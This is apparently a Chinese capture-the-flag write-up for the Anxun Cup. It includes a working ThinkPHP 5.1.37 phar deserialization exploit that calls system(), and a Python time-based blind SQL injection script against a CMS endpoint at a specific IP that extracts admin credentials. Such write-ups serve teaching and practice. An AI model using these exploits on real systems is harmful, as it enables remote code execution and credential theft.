安洵杯

EZ_TP

• thinkphp 5.1.37反序列化
• phar 触发反序列化

扫描目录的到www.zip 备份文件，报错得到thinkphp版本，查看控制器发现多了一个hello

通过world可以达到变量覆盖，向hello.txt任意写入，利用点在file_get_contents 来 通过 phar伪协议
去反序列化hello.txt中的内容 ，所以我们需要生成一个phar文件

exp:

<?php
namespace think\process\pipes{
    use think\model\Pivot;
    class Windows{
        private $files = [];
        public function __construct(){
            $this->files[]=new Pivot();
        }
    }
}
namespace think{
    abstract class Model{
        protected $append;
        private $data;
        function __construct(){
            $this->data = ['request'=>new Request()];
            $this->append = ['request' => ''];
            $this->append['request'] = array(
                'aa' => 'aaa'
            );
        }
    }    
}
namespace think\model{
    use think\Model;
    use think\Request;
    class Pivot extends Model{
    }
}
namespace think{
    class Request{
        protected $hook;
        protected $param;
        protected $filter;
        protected $config = [
            // 表单请求类型伪装变量
            'var_method'       => '_method',
            // 表单ajax伪装变量
            'var_ajax'         => '',
            // 表单pjax伪装变量
            'var_pjax'         => '_pjax',
            // PATHINFO变量名 用于兼容模式
            'var_pathinfo'     => 's',
            // 兼容PATH_INFO获取
            'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
            // 默认全局过滤方法 用逗号分隔多个
            'default_filter'   => '',
            // 域名根，如thinkphp.cn
            'url_domain_root'  => '',
            // HTTPS代理标识
            'https_agent_name' => '',
            // IP代理获取标识
            'http_agent_ip'    => 'HTTP_X_REAL_IP',
            // URL伪静态后缀
            'url_html_suffix'  => 'html',
        ];
        public function __construct(){
            $this->hook = ["visible"=>[$this,"isAjax"]];
            $this->param = ['dir'];    //2.修改
            $this->filter = array('1' => 'system','2' => '2');  //1.修改

        }
    }
}
namespace {
    use think\process\pipes\Windows;
    //echo base64_encode(serialize(new Windows));
    $w = new Windows();

    $p = new Phar('phar.phar');
    $p->startBuffering();
    $p->setStub('<?php __HALT_COMPILER();?>');
    $p->setMetadata($w);  //将自定义的meta-data存入manifest
    $p->addFromString("test", "12345");
    $p->stopBuffering();

    echo base64_encode(file_get_contents('phar.phar'));
}
?>

parse_str 会把 + 啥的解析成空格，所以 base64 字符串里的 + 需要两次 url 编码

浅谈Phar反序列化漏洞利用：N1CTF 2021 easyphp & 安洵杯2021 EZ_TP

Ezcms

• 代码审计

web.zip 源码泄露

scshop1.5 之前审过类似的站 SEMCMS php-v3.9 代码审计

还是存在注入点的，时间盲注

import requests
import time

s='abcdefghijklmnopqrstuvwxyz1234567890{}_-[]()!~QWERTYUIOPASDFGHJKLZXCVBNM'

url='http://47.108.195.119:6244/Core/Program/Ant_Rponse.php?actions=ReviewsAdd&lgid=1&type=Add'

datas={'msg_rating':'4','msg_name':'okami okami','msg_email':'okami@okami.com','msg_content':'1111','msg_pid':'2','msg_flag':'p','languageID':'1'}

payload="1'+(if((ascii(substr((select(user_name)from(sc_user),{}))={}),sleep(3),0))+'1"

#data='0b7752df93de693bdab0060746e38165'
#admin888
#admin888
data=''
for i in range(1,40):
 for a in s:
  payloads=payload.format(str(i),str(ord(a)))
  headers={'X-Forwarded-For':payloads}
  print(headers)
  start = int(time.time())
  r=requests.post(url,data=datas,headers=headers)
  response_time = int(time.time()) - start
  if response_time >= 3:
   data+=a
   print('data: '+str(data))
   break
  else:
   print(r.text)

得到账号密码，但是后来审计发现没有鉴权，成前台getshell了

rssblogv2

ezjson

hint ：fd会有什么呢？

可以读取文件

参考

安洵杯-WriteUp